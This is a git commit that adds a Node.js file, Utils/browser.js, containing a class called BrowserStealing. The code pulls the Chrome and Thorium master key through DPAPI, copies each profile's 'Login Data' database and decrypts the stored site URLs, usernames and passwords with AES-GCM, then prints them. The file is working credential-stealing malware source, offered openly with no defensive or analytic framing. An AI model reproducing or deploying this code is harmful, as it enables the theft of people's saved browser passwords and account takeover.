Add files via upload
This commit is contained in:
gumbobr0t
136
Utils/browser.js
Normal file
136
Utils/browser.js
Normal file
@@ -0,0 +1,136 @@
|
||||
const os = require('os');
|
||||
const fs = require('fs');
|
||||
const sqlite3 = require('sqlite3').verbose();
|
||||
const dpapi = require('./node-dpapi');
|
||||
const crypto = require('crypto')
|
||||
const path = require('path')
|
||||
|
||||
class BrowserStealing {
|
||||
constructor() {
|
||||
this.browserPaths = [path.join(os.homedir(), 'AppData', 'Local', 'Google', 'Chrome', 'User Data'), path.join(os.homedir(), 'AppData', 'Local', 'Thorium', 'User Data')]
|
||||
this.browserProfiles = ['Default', 'Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5']
|
||||
this.password_command = 'SELECT action_url, username_value, password_value FROM logins';
|
||||
//this.cookie_command = 'SELECT * FROM cookies';
|
||||
this.tempDir = `${os.homedir()}\\AppData\\Local\\Temp`;
|
||||
this.tempDirCreated = `${this.tempDir}\\${Math.random().toString(36).substring(7)}`;
|
||||
|
||||
//this.cookie_count = 0
|
||||
this.password_count = 0
|
||||
}
|
||||
|
||||
generateRandomString() {
|
||||
const randomCharacter = () => Math.random().toString(36).substring(2, 3).toUpperCase();
|
||||
return `${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}`;
|
||||
}
|
||||
|
||||
async getPasswords() {
|
||||
fs.mkdir(this.tempDirCreated, (error) => {
|
||||
if (error) {
|
||||
console.error('Error creating temp directory:', error);
|
||||
return;
|
||||
}
|
||||
console.log('Temp Directory created successfully.');
|
||||
for (const browserPath of this.browserPaths) {
|
||||
console.log(browserPath);
|
||||
const local_state = path.join(browserPath, 'Local State');
|
||||
console.log(local_state);
|
||||
|
||||
fs.readFile(local_state, 'utf8', (err, data) => {
|
||||
if (err) {
|
||||
console.error('Error reading local state file:', err);
|
||||
return;
|
||||
}
|
||||
|
||||
const encrypted = Buffer.from(JSON.parse(data).os_crypt.encrypted_key, 'base64').slice(5);
|
||||
|
||||
const decrypted = dpapi.unprotectData(Buffer.from(encrypted,"utf-8"), null, "CurrentUser");
|
||||
|
||||
console.log('Decryption Key:', decrypted);
|
||||
|
||||
for (const profile of this.browserProfiles) {
|
||||
const password_file = path.join(browserPath, profile, 'Login Data')
|
||||
console.log(password_file)
|
||||
const decryption_file = path.join(this.tempDirCreated, this.generateRandomString())
|
||||
console.log(decryption_file)
|
||||
|
||||
fs.copyFile(password_file, decryption_file, (error) => {
|
||||
if (error) {
|
||||
console.error('Error copying login data file:', error);
|
||||
return;
|
||||
}
|
||||
console.log('Login data file copied successfully.');
|
||||
|
||||
const db = new sqlite3.Database(decryption_file, sqlite3.OPEN_READWRITE, (err) => {
|
||||
if (err) {
|
||||
console.error('Error opening login database:', err);
|
||||
return;
|
||||
}
|
||||
|
||||
db.all(this.password_command, (err, rows) => {
|
||||
if (err) {
|
||||
console.error('Error executing login SQLite command:', err);
|
||||
} else {
|
||||
const formattedRows = rows.map(row => {
|
||||
if (row && row['password_value']) {
|
||||
let password_value = row['password_value'];
|
||||
let start = password_value.slice(3, 15),
|
||||
middle = password_value.slice(15, password_value.length - 16),
|
||||
end = password_value.slice(password_value.length - 16, password_value.length),
|
||||
decipher = crypto.createDecipheriv('aes-256-gcm', decrypted, start);
|
||||
decipher.setAuthTag(end);
|
||||
|
||||
this.password_count++;
|
||||
|
||||
return {
|
||||
action_url: row.action_url ? row.action_url.toString() : '',
|
||||
username_value: row.username_value ? row.username_value.toString() : '',
|
||||
password_value: decipher.update(middle, 'base64', 'utf-8') + decipher.final('utf-8').toString(),
|
||||
};
|
||||
} else {
|
||||
return {
|
||||
action_url: '',
|
||||
username_value: '',
|
||||
password_value: '',
|
||||
};
|
||||
}
|
||||
});
|
||||
|
||||
console.log('Password list:', formattedRows);
|
||||
console.log('Password count:', this.password_count);
|
||||
}
|
||||
|
||||
db.close((err) => {
|
||||
if (err) {
|
||||
console.error('Error closing login database:', err);
|
||||
}
|
||||
});
|
||||
});
|
||||
});
|
||||
});
|
||||
fs.unlink(decryption_file, (error) => {
|
||||
if (error) {
|
||||
console.error('Error deleting decryption password file:', error);
|
||||
} else {
|
||||
console.log('Decryption password File deleted successfully.');
|
||||
}
|
||||
});
|
||||
}
|
||||
});
|
||||
}
|
||||
});
|
||||
//this.cleanUp()
|
||||
}
|
||||
|
||||
//cleanUp() {
|
||||
// fs.rm(this.tempDirCreated, { recursive: true }, (error) => {
|
||||
// if (error) {
|
||||
// console.error('Error deleting temp directory:', error);
|
||||
// } else {
|
||||
// console.log('Temp Directory deleted successfully.');
|
||||
// }
|
||||
// });
|
||||
//}
|
||||
}
|
||||
|
||||
const browserStealer = new BrowserStealing();
|
||||
browserStealer.getPasswords()
|
||||
Reference in New Issue
Block a user